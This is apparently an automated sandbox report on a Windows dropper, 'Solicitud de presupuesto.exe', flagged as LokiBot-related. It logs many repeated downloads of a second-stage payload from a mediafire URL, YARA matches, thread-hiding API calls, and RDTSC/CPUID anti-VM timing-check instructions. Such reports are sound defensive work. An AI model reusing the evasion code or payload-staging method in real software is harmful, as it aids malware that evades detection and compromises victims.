Source: global traffic HTTP traffic detected: GET /file/9yrjccjdow659ow/sala_ziPUQPqut175.bin/file HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoHost: www.mediafire.comCache-Control: no-cacheCookie: __cf_bm=4uvYBC02UOd1cKbNPKWfjyZIQa98JqObMjUYB7mrBPM-1679319383-0-ASF0LRFYZ3fzU8W96P06z5pnBdiTkJxi2AmhQl/AOfgCYtpuFMuAJ0hIMtzGtX1cqaWmzpG19QaXcnYy0YKMmuQ=
Source: global traffic HTTP traffic detected: GET /error.php?errno=386&quickkey=9yrjccjdow659ow&origin=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoHost: www.mediafire.comCache-Control: no-cacheConnection: Keep-AliveCookie: __cf_bm=4uvYBC02UOd1cKbNPKWfjyZIQa98JqObMjUYB7mrBPM-1679319383-0-ASF0LRFYZ3fzU8W96P06z5pnBdiTkJxi2AmhQl/AOfgCYtpuFMuAJ0hIMtzGtX1cqaWmzpG19QaXcnYy0YKMmuQ=
Source: global traffic HTTP traffic detected: GET /file/9yrjccjdow659ow/sala_ziPUQPqut175.bin/file HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoHost: www.mediafire.comCache-Control: no-cacheCookie: __cf_bm=4uvYBC02UOd1cKbNPKWfjyZIQa98JqObMjUYB7mrBPM-1679319383-0-ASF0LRFYZ3fzU8W96P06z5pnBdiTkJxi2AmhQl/AOfgCYtpuFMuAJ0hIMtzGtX1cqaWmzpG19QaXcnYy0YKMmuQ=
Source: global traffic HTTP traffic detected: GET /error.php?errno=386&quickkey=9yrjccjdow659ow&origin=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoHost: www.mediafire.comCache-Control: no-cacheConnection: Keep-AliveCookie: __cf_bm=4uvYBC02UOd1cKbNPKWfjyZIQa98JqObMjUYB7mrBPM-1679319383-0-ASF0LRFYZ3fzU8W96P06z5pnBdiTkJxi2AmhQl/AOfgCYtpuFMuAJ0hIMtzGtX1cqaWmzpG19QaXcnYy0YKMmuQ=
Source: global traffic HTTP traffic detected: GET /file/9yrjccjdow659ow/sala_ziPUQPqut175.bin/file HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoHost: www.mediafire.comCache-Control: no-cacheCookie: __cf_bm=4uvYBC02UOd1cKbNPKWfjyZIQa98JqObMjUYB7mrBPM-1679319383-0-ASF0LRFYZ3fzU8W96P06z5pnBdiTkJxi2AmhQl/AOfgCYtpuFMuAJ0hIMtzGtX1cqaWmzpG19QaXcnYy0YKMmuQ=
Source: global traffic HTTP traffic detected: GET /error.php?errno=386&quickkey=9yrjccjdow659ow&origin=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoHost: www.mediafire.comCache-Control: no-cacheConnection: Keep-AliveCookie: __cf_bm=4uvYBC02UOd1cKbNPKWfjyZIQa98JqObMjUYB7mrBPM-1679319383-0-ASF0LRFYZ3fzU8W96P06z5pnBdiTkJxi2AmhQl/AOfgCYtpuFMuAJ0hIMtzGtX1cqaWmzpG19QaXcnYy0YKMmuQ=
Source: global traffic HTTP traffic detected: GET /file/9yrjccjdow659ow/sala_ziPUQPqut175.bin/file HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoHost: www.mediafire.comCache-Control: no-cacheCookie: __cf_bm=4uvYBC02UOd1cKbNPKWfjyZIQa98JqObMjUYB7mrBPM-1679319383-0-ASF0LRFYZ3fzU8W96P06z5pnBdiTkJxi2AmhQl/AOfgCYtpuFMuAJ0hIMtzGtX1cqaWmzpG19QaXcnYy0YKMmuQ=
Source: global traffic HTTP traffic detected: GET /error.php?errno=386&quickkey=9yrjccjdow659ow&origin=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoHost: www.mediafire.comCache-Control: no-cacheConnection: Keep-AliveCookie: __cf_bm=4uvYBC02UOd1cKbNPKWfjyZIQa98JqObMjUYB7mrBPM-1679319383-0-ASF0LRFYZ3fzU8W96P06z5pnBdiTkJxi2AmhQl/AOfgCYtpuFMuAJ0hIMtzGtX1cqaWmzpG19QaXcnYy0YKMmuQ=
Source: global traffic HTTP traffic detected: GET /file/9yrjccjdow659ow/sala_ziPUQPqut175.bin/file HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoHost: www.mediafire.comCache-Control: no-cacheCookie: __cf_bm=4uvYBC02UOd1cKbNPKWfjyZIQa98JqObMjUYB7mrBPM-1679319383-0-ASF0LRFYZ3fzU8W96P06z5pnBdiTkJxi2AmhQl/AOfgCYtpuFMuAJ0hIMtzGtX1cqaWmzpG19QaXcnYy0YKMmuQ=
Source: global traffic HTTP traffic detected: GET /error.php?errno=386&quickkey=9yrjccjdow659ow&origin=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoHost: www.mediafire.comCache-Control: no-cacheConnection: Keep-AliveCookie: __cf_bm=4uvYBC02UOd1cKbNPKWfjyZIQa98JqObMjUYB7mrBPM-1679319383-0-ASF0LRFYZ3fzU8W96P06z5pnBdiTkJxi2AmhQl/AOfgCYtpuFMuAJ0hIMtzGtX1cqaWmzpG19QaXcnYy0YKMmuQ=
Source: global traffic HTTP traffic detected: GET /file/9yrjccjdow659ow/sala_ziPUQPqut175.bin/file HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoHost: www.mediafire.comCache-Control: no-cacheCookie: __cf_bm=4uvYBC02UOd1cKbNPKWfjyZIQa98JqObMjUYB7mrBPM-1679319383-0-ASF0LRFYZ3fzU8W96P06z5pnBdiTkJxi2AmhQl/AOfgCYtpuFMuAJ0hIMtzGtX1cqaWmzpG19QaXcnYy0YKMmuQ=
Source: global traffic HTTP traffic detected: GET /error.php?errno=386&quickkey=9yrjccjdow659ow&origin=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoHost: www.mediafire.comCache-Control: no-cacheConnection: Keep-AliveCookie: __cf_bm=4uvYBC02UOd1cKbNPKWfjyZIQa98JqObMjUYB7mrBPM-1679319383-0-ASF0LRFYZ3fzU8W96P06z5pnBdiTkJxi2AmhQl/AOfgCYtpuFMuAJ0hIMtzGtX1cqaWmzpG19QaXcnYy0YKMmuQ=
Source: global traffic HTTP traffic detected: GET /file/9yrjccjdow659ow/sala_ziPUQPqut175.bin/file HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoHost: www.mediafire.comCache-Control: no-cacheCookie: __cf_bm=4uvYBC02UOd1cKbNPKWfjyZIQa98JqObMjUYB7mrBPM-1679319383-0-ASF0LRFYZ3fzU8W96P06z5pnBdiTkJxi2AmhQl/AOfgCYtpuFMuAJ0hIMtzGtX1cqaWmzpG19QaXcnYy0YKMmuQ=
Source: global traffic HTTP traffic detected: GET /error.php?errno=386&quickkey=9yrjccjdow659ow&origin=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoHost: www.mediafire.comCache-Control: no-cacheConnection: Keep-AliveCookie: __cf_bm=4uvYBC02UOd1cKbNPKWfjyZIQa98JqObMjUYB7mrBPM-1679319383-0-ASF0LRFYZ3fzU8W96P06z5pnBdiTkJxi2AmhQl/AOfgCYtpuFMuAJ0hIMtzGtX1cqaWmzpG19QaXcnYy0YKMmuQ=
Source: global traffic HTTP traffic detected: GET /file/9yrjccjdow659ow/sala_ziPUQPqut175.bin/file HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoHost: www.mediafire.comCache-Control: no-cacheCookie: __cf_bm=4uvYBC02UOd1cKbNPKWfjyZIQa98JqObMjUYB7mrBPM-1679319383-0-ASF0LRFYZ3fzU8W96P06z5pnBdiTkJxi2AmhQl/AOfgCYtpuFMuAJ0hIMtzGtX1cqaWmzpG19QaXcnYy0YKMmuQ=
Source: global traffic HTTP traffic detected: GET /error.php?errno=386&quickkey=9yrjccjdow659ow&origin=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoHost: www.mediafire.comCache-Control: no-cacheConnection: Keep-AliveCookie: __cf_bm=4uvYBC02UOd1cKbNPKWfjyZIQa98JqObMjUYB7mrBPM-1679319383-0-ASF0LRFYZ3fzU8W96P06z5pnBdiTkJxi2AmhQl/AOfgCYtpuFMuAJ0hIMtzGtX1cqaWmzpG19QaXcnYy0YKMmuQ=
Source: global traffic HTTP traffic detected: GET /file/9yrjccjdow659ow/sala_ziPUQPqut175.bin/file HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoHost: www.mediafire.comCache-Control: no-cacheCookie: __cf_bm=4uvYBC02UOd1cKbNPKWfjyZIQa98JqObMjUYB7mrBPM-1679319383-0-ASF0LRFYZ3fzU8W96P06z5pnBdiTkJxi2AmhQl/AOfgCYtpuFMuAJ0hIMtzGtX1cqaWmzpG19QaXcnYy0YKMmuQ=
Source: global traffic HTTP traffic detected: GET /error.php?errno=386&quickkey=9yrjccjdow659ow&origin=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoHost: www.mediafire.comCache-Control: no-cacheConnection: Keep-AliveCookie: __cf_bm=4uvYBC02UOd1cKbNPKWfjyZIQa98JqObMjUYB7mrBPM-1679319383-0-ASF0LRFYZ3fzU8W96P06z5pnBdiTkJxi2AmhQl/AOfgCYtpuFMuAJ0hIMtzGtX1cqaWmzpG19QaXcnYy0YKMmuQ=
Source: global traffic HTTP traffic detected: GET /file/9yrjccjdow659ow/sala_ziPUQPqut175.bin/file HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoHost: www.mediafire.comCache-Control: no-cacheCookie: __cf_bm=4uvYBC02UOd1cKbNPKWfjyZIQa98JqObMjUYB7mrBPM-1679319383-0-ASF0LRFYZ3fzU8W96P06z5pnBdiTkJxi2AmhQl/AOfgCYtpuFMuAJ0hIMtzGtX1cqaWmzpG19QaXcnYy0YKMmuQ=
Source: global traffic HTTP traffic detected: GET /error.php?errno=386&quickkey=9yrjccjdow659ow&origin=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoHost: www.mediafire.comCache-Control: no-cacheConnection: Keep-AliveCookie: __cf_bm=4uvYBC02UOd1cKbNPKWfjyZIQa98JqObMjUYB7mrBPM-1679319383-0-ASF0LRFYZ3fzU8W96P06z5pnBdiTkJxi2AmhQl/AOfgCYtpuFMuAJ0hIMtzGtX1cqaWmzpG19QaXcnYy0YKMmuQ=
Source: Joe Sandbox View JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
Source: Joe Sandbox View IP Address: 104.16.53.48
Source: unknown Network traffic detected: HTTP traffic on port 49708 -> 443
Source: Solicitud de presupuesto.exe, 00000001.00000002.576110769.0000000002380000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://static.cloudflareinsights.com/beacon.min.js/vaafb692b2aea4879b33c060e79fe94621666317369993
Source: Solicitud de presupuesto.exe, 00000001.00000002.575875706.0000000000560000.00000040.00000400.00020000.00000000.sdmp String found in binary or memory: https://www.mediafire.com/file/9yrjccjdow659ow/sala_ziPUQPqut175.bin/file
Source: unknown DNS traffic detected: queries for: www.mediafire.com
Source: global traffic HTTP traffic detected: GET /file/9yrjccjdow659ow/sala_ziPUQPqut175.bin/file HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko Host: www.mediafire.com Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /error.php?errno=386&quickkey=9yrjccjdow659ow&origin=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoHost: www.mediafire.comCache-Control: no-cacheConnection: Keep-AliveCookie: __cf_bm=4uvYBC02UOd1cKbNPKWfjyZIQa98JqObMjUYB7mrBPM-1679319383-0-ASF0LRFYZ3fzU8W96P06z5pnBdiTkJxi2AmhQl/AOfgCYtpuFMuAJ0hIMtzGtX1cqaWmzpG19QaXcnYy0YKMmuQ=
Source: global traffic HTTP traffic detected: GET /file/9yrjccjdow659ow/sala_ziPUQPqut175.bin/file HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoHost: www.mediafire.comCache-Control: no-cacheCookie: __cf_bm=4uvYBC02UOd1cKbNPKWfjyZIQa98JqObMjUYB7mrBPM-1679319383-0-ASF0LRFYZ3fzU8W96P06z5pnBdiTkJxi2AmhQl/AOfgCYtpuFMuAJ0hIMtzGtX1cqaWmzpG19QaXcnYy0YKMmuQ=
Source: global traffic HTTP traffic detected: GET /error.php?errno=386&quickkey=9yrjccjdow659ow&origin=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoHost: www.mediafire.comCache-Control: no-cacheConnection: Keep-AliveCookie: __cf_bm=4uvYBC02UOd1cKbNPKWfjyZIQa98JqObMjUYB7mrBPM-1679319383-0-ASF0LRFYZ3fzU8W96P06z5pnBdiTkJxi2AmhQl/AOfgCYtpuFMuAJ0hIMtzGtX1cqaWmzpG19QaXcnYy0YKMmuQ=
Source: global traffic HTTP traffic detected: GET /file/9yrjccjdow659ow/sala_ziPUQPqut175.bin/file HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoHost: www.mediafire.comCache-Control: no-cacheCookie: __cf_bm=4uvYBC02UOd1cKbNPKWfjyZIQa98JqObMjUYB7mrBPM-1679319383-0-ASF0LRFYZ3fzU8W96P06z5pnBdiTkJxi2AmhQl/AOfgCYtpuFMuAJ0hIMtzGtX1cqaWmzpG19QaXcnYy0YKMmuQ=
Source: global traffic HTTP traffic detected: GET /error.php?errno=386&quickkey=9yrjccjdow659ow&origin=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoHost: www.mediafire.comCache-Control: no-cacheConnection: Keep-AliveCookie: __cf_bm=4uvYBC02UOd1cKbNPKWfjyZIQa98JqObMjUYB7mrBPM-1679319383-0-ASF0LRFYZ3fzU8W96P06z5pnBdiTkJxi2AmhQl/AOfgCYtpuFMuAJ0hIMtzGtX1cqaWmzpG19QaXcnYy0YKMmuQ=
Source: global traffic HTTP traffic detected: GET /file/9yrjccjdow659ow/sala_ziPUQPqut175.bin/file HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoHost: www.mediafire.comCache-Control: no-cacheCookie: __cf_bm=4uvYBC02UOd1cKbNPKWfjyZIQa98JqObMjUYB7mrBPM-1679319383-0-ASF0LRFYZ3fzU8W96P06z5pnBdiTkJxi2AmhQl/AOfgCYtpuFMuAJ0hIMtzGtX1cqaWmzpG19QaXcnYy0YKMmuQ=
Source: global traffic HTTP traffic detected: GET /error.php?errno=386&quickkey=9yrjccjdow659ow&origin=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoHost: www.mediafire.comCache-Control: no-cacheConnection: Keep-AliveCookie: __cf_bm=4uvYBC02UOd1cKbNPKWfjyZIQa98JqObMjUYB7mrBPM-1679319383-0-ASF0LRFYZ3fzU8W96P06z5pnBdiTkJxi2AmhQl/AOfgCYtpuFMuAJ0hIMtzGtX1cqaWmzpG19QaXcnYy0YKMmuQ=
Source: global traffic HTTP traffic detected: GET /file/9yrjccjdow659ow/sala_ziPUQPqut175.bin/file HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoHost: www.mediafire.comCache-Control: no-cacheCookie: __cf_bm=4uvYBC02UOd1cKbNPKWfjyZIQa98JqObMjUYB7mrBPM-1679319383-0-ASF0LRFYZ3fzU8W96P06z5pnBdiTkJxi2AmhQl/AOfgCYtpuFMuAJ0hIMtzGtX1cqaWmzpG19QaXcnYy0YKMmuQ=
Source: global traffic HTTP traffic detected: GET /error.php?errno=386&quickkey=9yrjccjdow659ow&origin=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoHost: www.mediafire.comCache-Control: no-cacheConnection: Keep-AliveCookie: __cf_bm=4uvYBC02UOd1cKbNPKWfjyZIQa98JqObMjUYB7mrBPM-1679319383-0-ASF0LRFYZ3fzU8W96P06z5pnBdiTkJxi2AmhQl/AOfgCYtpuFMuAJ0hIMtzGtX1cqaWmzpG19QaXcnYy0YKMmuQ=
Source: global traffic HTTP traffic detected: GET /file/9yrjccjdow659ow/sala_ziPUQPqut175.bin/file HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoHost: www.mediafire.comCache-Control: no-cacheCookie: __cf_bm=4uvYBC02UOd1cKbNPKWfjyZIQa98JqObMjUYB7mrBPM-1679319383-0-ASF0LRFYZ3fzU8W96P06z5pnBdiTkJxi2AmhQl/AOfgCYtpuFMuAJ0hIMtzGtX1cqaWmzpG19QaXcnYy0YKMmuQ=
Source: global traffic HTTP traffic detected: GET /error.php?errno=386&quickkey=9yrjccjdow659ow&origin=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoHost: www.mediafire.comCache-Control: no-cacheConnection: Keep-AliveCookie: __cf_bm=4uvYBC02UOd1cKbNPKWfjyZIQa98JqObMjUYB7mrBPM-1679319383-0-ASF0LRFYZ3fzU8W96P06z5pnBdiTkJxi2AmhQl/AOfgCYtpuFMuAJ0hIMtzGtX1cqaWmzpG19QaXcnYy0YKMmuQ=
Source: global traffic HTTP traffic detected: GET /file/9yrjccjdow659ow/sala_ziPUQPqut175.bin/file HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoHost: www.mediafire.comCache-Control: no-cacheCookie: __cf_bm=4uvYBC02UOd1cKbNPKWfjyZIQa98JqObMjUYB7mrBPM-1679319383-0-ASF0LRFYZ3fzU8W96P06z5pnBdiTkJxi2AmhQl/AOfgCYtpuFMuAJ0hIMtzGtX1cqaWmzpG19QaXcnYy0YKMmuQ=
Source: global traffic HTTP traffic detected: GET /error.php?errno=386&quickkey=9yrjccjdow659ow&origin=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoHost: www.mediafire.comCache-Control: no-cacheConnection: Keep-AliveCookie: __cf_bm=4uvYBC02UOd1cKbNPKWfjyZIQa98JqObMjUYB7mrBPM-1679319383-0-ASF0LRFYZ3fzU8W96P06z5pnBdiTkJxi2AmhQl/AOfgCYtpuFMuAJ0hIMtzGtX1cqaWmzpG19QaXcnYy0YKMmuQ=
Source: global traffic HTTP traffic detected: GET /file/9yrjccjdow659ow/sala_ziPUQPqut175.bin/file HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoHost: www.mediafire.comCache-Control: no-cacheCookie: __cf_bm=4uvYBC02UOd1cKbNPKWfjyZIQa98JqObMjUYB7mrBPM-1679319383-0-ASF0LRFYZ3fzU8W96P06z5pnBdiTkJxi2AmhQl/AOfgCYtpuFMuAJ0hIMtzGtX1cqaWmzpG19QaXcnYy0YKMmuQ=
Source: global traffic HTTP traffic detected: GET /error.php?errno=386&quickkey=9yrjccjdow659ow&origin=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoHost: www.mediafire.comCache-Control: no-cacheConnection: Keep-AliveCookie: __cf_bm=4uvYBC02UOd1cKbNPKWfjyZIQa98JqObMjUYB7mrBPM-1679319383-0-ASF0LRFYZ3fzU8W96P06z5pnBdiTkJxi2AmhQl/AOfgCYtpuFMuAJ0hIMtzGtX1cqaWmzpG19QaXcnYy0YKMmuQ=
Source: global traffic HTTP traffic detected: GET /file/9yrjccjdow659ow/sala_ziPUQPqut175.bin/file HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoHost: www.mediafire.comCache-Control: no-cacheCookie: __cf_bm=4uvYBC02UOd1cKbNPKWfjyZIQa98JqObMjUYB7mrBPM-1679319383-0-ASF0LRFYZ3fzU8W96P06z5pnBdiTkJxi2AmhQl/AOfgCYtpuFMuAJ0hIMtzGtX1cqaWmzpG19QaXcnYy0YKMmuQ=
Source: global traffic HTTP traffic detected: GET /error.php?errno=386&quickkey=9yrjccjdow659ow&origin=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoHost: www.mediafire.comCache-Control: no-cacheConnection: Keep-AliveCookie: __cf_bm=4uvYBC02UOd1cKbNPKWfjyZIQa98JqObMjUYB7mrBPM-1679319383-0-ASF0LRFYZ3fzU8W96P06z5pnBdiTkJxi2AmhQl/AOfgCYtpuFMuAJ0hIMtzGtX1cqaWmzpG19QaXcnYy0YKMmuQ=
Source: global traffic HTTP traffic detected: GET /file/9yrjccjdow659ow/sala_ziPUQPqut175.bin/file HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoHost: www.mediafire.comCache-Control: no-cacheCookie: __cf_bm=4uvYBC02UOd1cKbNPKWfjyZIQa98JqObMjUYB7mrBPM-1679319383-0-ASF0LRFYZ3fzU8W96P06z5pnBdiTkJxi2AmhQl/AOfgCYtpuFMuAJ0hIMtzGtX1cqaWmzpG19QaXcnYy0YKMmuQ=
Source: unknown HTTPS traffic detected: 104.16.53.48:443 -> 192.168.2.5:49696 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.16.53.48:443 -> 192.168.2.5:49750 version: TLS 1.2

System Summary

Source: initial sample Icon embedded in PE file: bad icon match: 20047c7c70f0e004
Source: 00000000.00000000.307522232.000000000040D000.00000020.00000001.01000000.00000003.sdmp, type: MEMORY Matched rule: Auto-generated rule - file scan copy.pdf.r11 Author: Florian Roth (Nextron Systems)
Source: 00000001.00000000.403982899.000000000040D000.00000020.00000001.01000000.00000003.sdmp, type: MEMORY Matched rule: Auto-generated rule - file scan copy.pdf.r11 Author: Florian Roth (Nextron Systems)
Source: 00000000.00000002.404604650.000000000040D000.00000020.00000001.01000000.00000003.sdmp, type: MEMORY Matched rule: Auto-generated rule - file scan copy.pdf.r11 Author: Florian Roth (Nextron Systems)
Source: Solicitud de presupuesto.exe Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
Source: 00000000.00000000.307522232.000000000040D000.00000020.00000001.01000000.00000003.sdmp, type: MEMORY Matched rule: LokiBot_Dropper_Packed_R11_Feb18 date = 2018-02-14, hash1 = 3b248d40fd7acb839cc592def1ed7652734e0e5ef93368be3c36c042883a3029, author = Florian Roth (Nextron Systems), description = Auto-generated rule - file scan copy.pdf.r11, reference = https://app.any.run/tasks/401df4d9-098b-4fd0-86e0-7a52ce6ddbf5, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 00000001.00000000.403982899.000000000040D000.00000020.00000001.01000000.00000003.sdmp, type: MEMORY Matched rule: LokiBot_Dropper_Packed_R11_Feb18 date = 2018-02-14, hash1 = 3b248d40fd7acb839cc592def1ed7652734e0e5ef93368be3c36c042883a3029, author = Florian Roth (Nextron Systems), description = Auto-generated rule - file scan copy.pdf.r11, reference = https://app.any.run/tasks/401df4d9-098b-4fd0-86e0-7a52ce6ddbf5, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 00000000.00000002.404604650.000000000040D000.00000020.00000001.01000000.00000003.sdmp, type: MEMORY Matched rule: LokiBot_Dropper_Packed_R11_Feb18 date = 2018-02-14, hash1 = 3b248d40fd7acb839cc592def1ed7652734e0e5ef93368be3c36c042883a3029, author = Florian Roth (Nextron Systems), description = Auto-generated rule - file scan copy.pdf.r11, reference = https://app.any.run/tasks/401df4d9-098b-4fd0-86e0-7a52ce6ddbf5, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: Solicitud de presupuesto.exe, 00000000.00000002.404843824.0000000000414000.00000002.00000001.01000000.00000003.sdmp Binary or memory string: OriginalFilenameHalvfemser.exe vs Solicitud de presupuesto.exe
Source: Solicitud de presupuesto.exe, 00000000.00000002.408124512.0000000002950000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenameHalvfemser.exeFE2XGabba vs Solicitud de presupuesto.exe
Source: Solicitud de presupuesto.exe, 00000001.00000000.404039539.0000000000414000.00000002.00000001.01000000.00000003.sdmp Binary or memory string: OriginalFilenameHalvfemser.exe vs Solicitud de presupuesto.exe
Source: Solicitud de presupuesto.exe Binary or memory string: OriginalFilenameHalvfemser.exe vs Solicitud de presupuesto.exe
Source: C:\Users\user\Desktop\Solicitud de presupuesto.exe Code function: 1_2_005687B2 NtProtectVirtualMemory, 1_2_005687B2
Source: C:\Users\user\Desktop\Solicitud de presupuesto.exe Code function: 1_2_005604BE NtSetInformationThread, 1_2_005604BE
Source: C:\Users\user\Desktop\Solicitud de presupuesto.exe Code function: 1_2_005604BC NtSetInformationThread, 1_2_005604BC
Source: C:\Users\user\Desktop\Solicitud de presupuesto.exe Code function: 1_2_00560526 NtSetInformationThread, 1_2_00560526
Source: C:\Users\user\Desktop\Solicitud de presupuesto.exe Code function: 1_2_005605F0 NtSetInformationThread, 1_2_005605F0
Source: C:\Users\user\Desktop\Solicitud de presupuesto.exe Code function: 1_2_00560592 NtSetInformationThread, 1_2_00560592
Source: Solicitud de presupuesto.exe Virustotal: Detection: 78%
Source: Solicitud de presupuesto.exe ReversingLabs: Detection: 70%
Source: Solicitud de presupuesto.exe Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: C:\Users\user\Desktop\Solicitud de presupuesto.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: C:\Users\user\Desktop\Solicitud de presupuesto.exe Section loaded: C:\Windows\SysWOW64\msvbvm60.dll
Source: unknown Process created: C:\Users\user\Desktop\Solicitud de presupuesto.exe C:\Users\user\Desktop\Solicitud de presupuesto.exe
Source: C:\Users\user\Desktop\Solicitud de presupuesto.exe Process created: C:\Users\user\Desktop\Solicitud de presupuesto.exe C:\Users\user\Desktop\Solicitud de presupuesto.exe
Source: C:\Users\user\Desktop\Solicitud de presupuesto.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32
Source: classification engine Classification label: mal100.rans.troj.evad.winEXE@3/0@1/1
Source: C:\Users\user\Desktop\Solicitud de presupuesto.exe File read: C:\Windows\System32\drivers\etc\hosts

Data Obfuscation

Source: Yara match File source: 00000001.00000002.575875706.0000000000560000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: Solicitud de presupuesto.exe PID: 1352, type: MEMORYSTR
Source: C:\Users\user\Desktop\Solicitud de presupuesto.exe Code function: 1_2_00566396 push ecx; ret 1_2_005663E0
Source: C:\Users\user\Desktop\Solicitud de presupuesto.exe Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion

Source: C:\Users\user\Desktop\Solicitud de presupuesto.exe RDTSC instruction interceptor: First address: 00000000028B755F second address: 00000000028B757D instructions: 0x00000000 rdtsc 0x00000002 lfence 0x00000005 shl edx, 20h 0x00000008 or edx, eax 0x0000000a mov esi, edx 0x0000000c pushad 0x0000000d mov eax, 00000001h 0x00000012 cpuid 0x00000014 bt ecx, 1Fh 0x00000018 jc 00007FD4AD1AA552h 0x0000001a popad 0x0000001b lfence 0x0000001e rdtsc
Source: C:\Users\user\Desktop\Solicitud de presupuesto.exe RDTSC instruction interceptor: First address: 00000000028B757D second address: 00000000028B755F instructions: 0x00000000 rdtsc 0x00000002 lfence 0x00000005 shl edx, 20h 0x00000008 or edx, eax 0x0000000a sub edx, esi 0x0000000c cmp edx, 00000000h 0x0000000f jle 00007FD4ACB61440h 0x00000011 ret 0x00000012 add edi, edx 0x00000014 pop ecx 0x00000015 dec ecx 0x00000016 cmp ecx, 00000000h 0x00000019 jne 00007FD4ACB61463h 0x0000001b push ecx 0x0000001c call 00007FD4ACB614D2h 0x00000021 lfence 0x00000024 rdtsc
